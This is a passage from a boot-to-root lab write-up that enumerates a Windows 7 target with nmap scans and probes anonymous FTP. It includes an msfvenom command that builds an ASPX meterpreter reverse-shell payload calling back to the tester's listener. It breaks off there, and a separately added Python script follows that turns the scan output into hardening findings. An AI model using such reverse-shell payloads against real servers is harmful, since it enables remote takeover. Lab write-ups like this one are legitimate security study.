Some fun I had hacking on a boot-to-root challenge I did with a mate recently.

Enumeration

OS Fingerprint

nmap -O 192.168.0.102

OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_vista::sp1:home_premium cpe:/o:microsoft:windows_7
OS details: Microsoft Windows Server 2008 R2 SP1, Microsoft Windows Vista Home Premium SP1, Windows 7, or Windows Server 2008
Nmap done: 1 IP address (1 host up) scanned in 148.76 seconds

What services are running?

nmap -A -sV 192.168.0.102

| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_http-title: Site doesn't have a title (text/html).
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Windows 7 Enterprise 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server  Microsoft Terminal Service
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp  open  http           Apache Tomcat/Coyote JSP engine 1.1
|_http-open-proxy: Proxy might be redirecting requests
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
49156/tcp open  msrpc          Microsoft Windows RPC
49157/tcp open  msrpc          Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see ).
Service Info: Host: IE11WIN7 OS: Windows CPE: cpe:/o:microsoft:windows
| OS: Windows 7 Enterprise 7601 Service Pack 1 (Windows 7 Enterprise 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
|_ message_signing: disabled (dangerous, but default)
|_ Message signing enabled but not required
Nmap done: 1 IP address (1 host up) scanned in 66.26 seconds

A Windows box, running a bunch of services like FTP, two HTTP servers, SMB and AJP.

AJP is a wire protocol. It is an optimized version of the HTTP protocol that allows a standalone web server such as Apache to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static content. The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat-related content.

Vulnerabilities scan Results

nmap -script vuln 192.168.0.102

|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| Diffie-Hellman Key Exchange Insufficient Group Strength
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
| /manager/html/upload: Apache Tomcat (401 Unauthorized)
| /manager/html: Apache Tomcat (401 Unauthorized)
|_ /docs/: Potentially interesting folder
| Slowloris tries to keep many connections to the target web server open and hold
| It accomplishes this by opening connections to
| the target web server and sending a partial request.
| the http server's resources causing Denial Of Service.
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
Nmap done: 1 IP address (1 host up) scanned in 201.12 seconds

Damn, no remote code execution vulnerabilities, but lots of services to dig into.

Exploitation

Anonymous FTP - test login

ftp 192.168.0.102
150 Opening data channel for directory listing of "/"

It looks like the web server (IIS on Windows) is configured to run aspx (ASP.NET) server-side code. Verify this by visiting http://192.168.0.102/hello.aspx in a browser.

Create an ASPX reverse shell payload using MSFVenom

msfvenom -p windows/meterpreter/reverse_tcp -f aspx LHOST=192.168.0.99 LPORT=4444 -o rshell.aspx
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
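To turn scan output like the above into a hardening to-do list, here is an added example (not from the post) that parses nmap's normal output format and flags the weak settings this box showed: anonymous FTP, SMB signing not enforced, an exposed Tomcat manager and reachable RDP. The sample text is constructed from the post's scan lines; the 21/tcp port line, the "http-enum:" and "Host script results:" headers, and the remediation wording are assumptions.

```python
import re

# Constructed sample built from the post's "nmap -A -sV" and "-script vuln" lines.
# The 21/tcp line and the "http-enum:" / "Host script results:" headers are assumed.
SAMPLE_NMAP_OUTPUT = """\
21/tcp    open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
445/tcp   open  microsoft-ds  Windows 7 Enterprise 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
8080/tcp  open  http          Apache Tomcat/Coyote JSP engine 1.1
| http-enum:
|   /manager/html: Apache Tomcat (401 Unauthorized)
|_  /docs/: Potentially interesting folder
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|_  Message signing enabled but not required
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")

# NSE output patterns and the hardening action each one implies (wording is ours).
RULES = [
    (r"ftp-anon: Anonymous FTP login allowed", "HIGH", "anonymous FTP: disable it or make the share read-only"),
    (r"message_signing: disabled", "HIGH", "SMB signing disabled: enforce signing to stop relay attacks"),
    (r"Message signing enabled but not required", "MEDIUM", "SMB2 signing optional: require it via policy"),
    (r"/manager/html", "MEDIUM", "Tomcat manager reachable: restrict by source IP, strong credentials"),
]
# Services that are a finding simply by being reachable from the scanning host.
EXPOSED_SERVICES = {"ms-wbt-server": ("MEDIUM", "RDP reachable: require NLA, limit source networks")}

def triage(nmap_text):
    """Return (severity, port, action) tuples for weak settings found in nmap normal output."""
    findings = []
    port = "host"  # script lines under "Host script results:" belong to the host, not a port
    for line in nmap_text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, service = f"{m.group(1)}/{m.group(2)}", m.group(3)
            if service in EXPOSED_SERVICES:
                findings.append((EXPOSED_SERVICES[service][0], port, EXPOSED_SERVICES[service][1]))
        elif line.startswith("Host script results"):
            port = "host"
        elif line.startswith("|"):  # NSE script output for the current port or host
            for pattern, severity, action in RULES:
                if re.search(pattern, line):
                    findings.append((severity, port, action))
    return findings
```

Run `triage(SAMPLE_NMAP_OUTPUT)` to get the five findings for this box; feed it the saved output of `nmap -oN` on a real scan to triage your own hosts.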